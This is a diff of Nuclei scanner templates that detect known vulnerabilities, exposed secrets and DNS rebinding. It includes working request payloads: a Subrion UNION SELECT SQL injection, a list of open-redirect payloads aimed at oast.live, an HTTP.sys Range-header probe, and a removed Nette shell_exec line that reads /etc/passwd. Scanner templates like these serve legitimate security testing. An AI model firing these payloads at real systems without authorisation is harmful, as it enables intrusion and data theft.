|
|
|
@ -1,5 +1,4 @@
|
||||||
id: dns-rebinding
|
id: dns-rebinding
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: DNS Rebinding Attack
|
name: DNS Rebinding Attack
|
||||||
author: ricardomaia
|
author: ricardomaia
|
||||||
|
@ -10,6 +9,8 @@ info:
|
||||||
- https://capec.mitre.org/data/definitions/275.html
|
- https://capec.mitre.org/data/definitions/275.html
|
||||||
- https://payatu.com/blog/dns-rebinding/
|
- https://payatu.com/blog/dns-rebinding/
|
||||||
- https://heimdalsecurity.com/blog/dns-rebinding/
|
- https://heimdalsecurity.com/blog/dns-rebinding/
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
tags: redirect,dns,network
|
tags: redirect,dns,network
|
||||||
|
|
||||||
dns:
|
dns:
|
||||||
|
@ -20,7 +21,7 @@ dns:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: answer
|
part: answer
|
||||||
regex:
|
regex:
|
||||||
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
|
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
@ -28,35 +29,22 @@ dns:
|
||||||
name: IPv4
|
name: IPv4
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
|
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
|
||||||
|
|
||||||
- name: "{{FQDN}}"
|
- name: "{{FQDN}}"
|
||||||
type: AAAA
|
type: AAAA
|
||||||
matchers:
|
matchers:
|
||||||
# IPv6 Compressed
|
# IPv6 Compressed and Full
|
||||||
- type: regex
|
- type: regex
|
||||||
part: answer
|
part: answer
|
||||||
regex:
|
regex:
|
||||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
|
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
|
||||||
|
|
||||||
# IPv6
|
|
||||||
- type: regex
|
|
||||||
part: answer
|
|
||||||
regex:
|
|
||||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: answer
|
part: answer
|
||||||
name: IPv6_Compressed
|
name: IPv6_ULA
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
|
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
|
||||||
|
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
|
||||||
- type: regex
|
|
||||||
part: answer
|
|
||||||
name: IPv6
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
|
|
||||||
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
|
|
|
@ -18,7 +18,7 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: extracted-token
|
name: extracted-token
|
||||||
regex:
|
regex:
|
||||||
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
|
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\s)*(:|=)+"
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
name: extracted-endpoints
|
name: extracted-endpoints
|
||||||
|
@ -30,5 +30,9 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: extracted-uri
|
name: extracted-uri
|
||||||
regex:
|
regex:
|
||||||
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+"
|
- "(?i)([a-z]{2,10}):(//|/)[a-z0-9\\./?&-_=:]+"
|
||||||
# digest: 4a0a00473045022074fd41f8b59517248d39216756a55be729fe598400825417fc9ab281c4c626d6022100f3a770bad05731314a45020b4a94b393b96dfae3590e0e526327ac84fa760aa2:922c64590222798bb761d5b6d8e72950
|
- type: regex
|
||||||
|
name: AMAZON-ACCES-KEY
|
||||||
|
regex:
|
||||||
|
- "(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
|
||||||
|
# digest: 4a0a0047304502200738658ef4985c1261c662fd545a23504b402343ad994af584866d74d37e11ac022100c8213e439b8a574bee55ce0881363c0964830df8255bcd89249d37a778f038ba:922c64590222798bb761d5b6d8e72950
|
|
@ -1,4 +1,4 @@
|
||||||
id: linkedin-client-id
|
id: linkedin-id
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Linkedin Client ID
|
name: Linkedin Client ID
|
||||||
|
@ -13,4 +13,4 @@ file:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
|
- "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
|
||||||
# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950
|
|
@ -20,7 +20,7 @@ info:
|
||||||
cve-id: CVE-2018-25031
|
cve-id: CVE-2018-25031
|
||||||
cwe-id: CWE-20
|
cwe-id: CWE-20
|
||||||
epss-score: 0.00265
|
epss-score: 0.00265
|
||||||
epss-percentile: 0.64105
|
epss-percentile: 0.65414
|
||||||
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -30,7 +30,6 @@ info:
|
||||||
shodan-query: http.component:"Swagger"
|
shodan-query: http.component:"Swagger"
|
||||||
fofa-query: icon_hash="-1180440057"
|
fofa-query: icon_hash="-1180440057"
|
||||||
tags: headless,cve,cve2018,swagger,xss,smartbear
|
tags: headless,cve,cve2018,swagger,xss,smartbear
|
||||||
|
|
||||||
headless:
|
headless:
|
||||||
- steps:
|
- steps:
|
||||||
- args:
|
- args:
|
||||||
|
@ -71,4 +70,4 @@ headless:
|
||||||
words:
|
words:
|
||||||
- "swagger"
|
- "swagger"
|
||||||
case-insensitive: true
|
case-insensitive: true
|
||||||
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950
|
|
@ -21,9 +21,6 @@ headless:
|
||||||
- action: waitload
|
- action: waitload
|
||||||
payloads:
|
payloads:
|
||||||
redirect:
|
redirect:
|
||||||
- '%0a/oast.live/'
|
|
||||||
- '%0d/oast.live/'
|
|
||||||
- '%00/oast.live/'
|
|
||||||
- '%09/oast.live/'
|
- '%09/oast.live/'
|
||||||
- '%5C%5Coast.live/%252e%252e%252f'
|
- '%5C%5Coast.live/%252e%252e%252f'
|
||||||
- '%5Coast.live'
|
- '%5Coast.live'
|
||||||
|
@ -112,10 +109,14 @@ headless:
|
||||||
- 'cgi-bin/redirect.cgi?oast.live'
|
- 'cgi-bin/redirect.cgi?oast.live'
|
||||||
- 'out?oast.live'
|
- 'out?oast.live'
|
||||||
- 'login?to=http://oast.live'
|
- 'login?to=http://oast.live'
|
||||||
|
- '#/oast.live'
|
||||||
|
- '%0a/oast.live/'
|
||||||
|
- '%0d/oast.live/'
|
||||||
|
- '%00/oast.live/'
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "Interactsh Server"
|
- "Interactsh Server"
|
||||||
# digest: 4b0a00483046022100a8c70dc73a12a3a282a012774a3a10a99f153d80d4c16a01f2bb4bd9770903dc022100f491074035d26885797db4152bad2ecd436ebf4d1f7fa479d402303ceac17db0:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,33 @@
|
||||||
|
id: CNVD-2023-96945
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: McVie Safety Digital Management Platform - Arbitrary File Upload
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Jiangsu Maiwei Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.
|
||||||
|
reference:
|
||||||
|
- https://blog.csdn.net/weixin_42628854/article/details/136036109
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: "安全生产数字化管理平台"
|
||||||
|
tags: cnvd,cnvd2023,file-upload,mcvie
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/Content/Plugins/uploader/FileChoose.html"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "选择文件"
|
||||||
|
- "提交"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2014-6271
|
cve-id: CVE-2014-6271
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
epss-score: 0.97564
|
epss-score: 0.97559
|
||||||
epss-percentile: 0.99999
|
epss-percentile: 0.99997
|
||||||
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 8
|
max-request: 8
|
||||||
|
@ -58,4 +58,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
||||||
cve-id: CVE-2014-8799
|
cve-id: CVE-2014-8799
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
epss-score: 0.17844
|
epss-score: 0.17844
|
||||||
epss-percentile: 0.95686
|
epss-percentile: 0.96002
|
||||||
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
|
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
@ -50,4 +50,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: CVE-2015-1635
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
|
||||||
|
author: Phillipo
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/36773
|
||||||
|
- https://www.securitysift.com/an-analysis-of-ms15-034/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1635
|
||||||
|
classification:
|
||||||
|
cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||||
|
cvss-score: 10.0
|
||||||
|
cwe-id: CWE-94
|
||||||
|
cve-id: CVE-2015-1635
|
||||||
|
cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: microsoft
|
||||||
|
product: windows_7
|
||||||
|
shodan-query: '"Microsoft-IIS" "2015"'
|
||||||
|
tags: cve,cve2015,kev,microsoft,iis,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
headers:
|
||||||
|
Range: "bytes=0-18446744073709551615"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "HTTP Error 416"
|
||||||
|
- "The requested range is not satisfiable"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "Microsoft"
|
||||||
|
# digest: 4b0a0048304602210089c354040a56574a5a17f803370b94a87244e98159c6eff1b1b07f666e2c834a022100936fbfa7282962b47f7de82e84e67d0cc32921b313c84406269eef740f6ccec0:922c64590222798bb761d5b6d8e72950
|
|
@ -2,7 +2,7 @@ id: CVE-2015-2794
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: DotNetNuke 07.04.00 - Administration Authentication Bypass
|
name: DotNetNuke 07.04.00 - Administration Authentication Bypass
|
||||||
author: 1337kro
|
author: 0xr2r
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
|
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
|
||||||
|
@ -45,4 +45,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a004730450221008832d97a34293638b4c086c5a28aff802fdb47075161daec024897821ed9922b02202ce97274853804157a6224c3711bc0fb0fa9f58c60aef8297fc5f8747126c182:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402205b931368f972e054b081418fdcdbd6d16c6c7a1ef76a663c0d9db9d8c3fc353f02207c5737d6057af1e35c3ca3e3687a60ef1bf3ba7e59e7d90e9a39bd6fabc3213a:922c64590222798bb761d5b6d8e72950
|
|
@ -27,19 +27,23 @@ info:
|
||||||
product: subrion_cms
|
product: subrion_cms
|
||||||
tags: cve2017,cve,sqli,subrion,intelliants
|
tags: cve2017,cve,sqli,subrion,intelliants
|
||||||
|
|
||||||
|
variables:
|
||||||
|
string: "{{to_lower(rand_base(5))}}"
|
||||||
|
hex_string: "{{hex_encode(string)}}"
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
|
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "projectdiscovery.io"
|
- '{{string}}'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a004730450221008122f5a7f1c537936474771ca8cbc773e4fd522783e15948324010c182882d44022034bde42890c4acf5f2806b5e320405129f41263dcbf69b64ef49635cf58d8e0d:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
||||||
max-request: 65
|
max-request: 65
|
||||||
vendor: embedthis
|
vendor: embedthis
|
||||||
product: goahead
|
product: goahead
|
||||||
tags: cve,cve2017,rce,goahead,brute-force,kev,vulhub,embedthis
|
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -117,4 +117,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a00473045022047ce66d8caa4a42f359d87b562ccfd3702d82b3e5306d17049fc7572d66bc16c022100bf004dc58ed2839f05b495f4434442d941c1de5236150a6fd3606381073f7ed5:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2018-17431
|
cve-id: CVE-2018-17431
|
||||||
cwe-id: CWE-287
|
cwe-id: CWE-287
|
||||||
epss-score: 0.11315
|
epss-score: 0.11416
|
||||||
epss-percentile: 0.94677
|
epss-percentile: 0.95073
|
||||||
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
|
@ -50,4 +50,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950
|
|
@ -15,13 +15,14 @@ info:
|
||||||
- https://wordpress.org/plugins/jsmol2wp/
|
- https://wordpress.org/plugins/jsmol2wp/
|
||||||
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
|
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
|
||||||
|
- https://github.com/ARPSyndicate/cvemon
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2018-20463
|
cve-id: CVE-2018-20463
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
epss-score: 0.01939
|
epss-score: 0.01939
|
||||||
epss-percentile: 0.87393
|
epss-percentile: 0.88289
|
||||||
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
|
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -53,4 +54,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950
|
|
@ -27,7 +27,7 @@ info:
|
||||||
max-request: 100
|
max-request: 100
|
||||||
vendor: zabbix
|
vendor: zabbix
|
||||||
product: zabbix
|
product: zabbix
|
||||||
tags: cve2019,cve,brute-force,auth-bypass,login,edb,zabbix
|
tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -49,4 +49,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4b0a004830460221009f2eef4ff9783ccdb0da0deb516cbeef6088cf8748cea7f07e2d0db26e145471022100e1a20eb9c42ec21526ec4e60014c9c44a9cb9eebf923e1e0016faabd478bd8ce:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221009174b05ef7a525c5b373a0d82c9f2e6ef53e2f208703ddae369493fdf4e868d5022100ffcea06c1174e9a583cf539ef4f49ecda6eb0849493b197b58859a5e058e7cb4:922c64590222798bb761d5b6d8e72950
|
|
@ -27,20 +27,24 @@ info:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: nette
|
vendor: nette
|
||||||
product: application
|
product: application
|
||||||
|
fofa-query: app="nette-Framework"
|
||||||
|
verified: true
|
||||||
tags: cve2020,cve,nette,rce
|
tags: cve2020,cve,nette,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
|
- "{{BaseURL}}/nette.micro/?callback=phpcredits"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: word
|
||||||
regex:
|
part: body
|
||||||
- "root:.*:0:0:"
|
words:
|
||||||
|
- "PHP Credits"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: header
|
||||||
- 200
|
words:
|
||||||
# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
|
- "Nette Framework"
|
||||||
|
# digest: 4a0a00473045022100c7edf32bbe09d40436d30da39271cd16112ead5a0c94b155a42dce50938fb84c0220526028064e9f272d8365aafc3b6b7558d1f606bd48da3dcf7576ceee091b452e:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2020-24223
|
cve-id: CVE-2020-24223
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
epss-score: 0.00976
|
epss-score: 0.0069
|
||||||
epss-percentile: 0.81758
|
epss-percentile: 0.79602
|
||||||
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
@ -49,4 +49,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
||||||
vendor: redhat
|
vendor: redhat
|
||||||
product: keycloak
|
product: keycloak
|
||||||
shodan-query: "title:\"keycloak\""
|
shodan-query: "title:\"keycloak\""
|
||||||
tags: cve,cve2020,keyclock,exposure
|
tags: cve,cve2020,keycloak,exposure
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -52,4 +52,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4b0a00483046022100a6e9bf7a3b64c5e90d619114c77ef26e4910bb56c4488208e2381e574562d66e022100944c1456d486efb48fc5d8d143759d157d22b7b23d81cffcf4cbd94219ae8cd0:922c64590222798bb761d5b6d8e72950
|
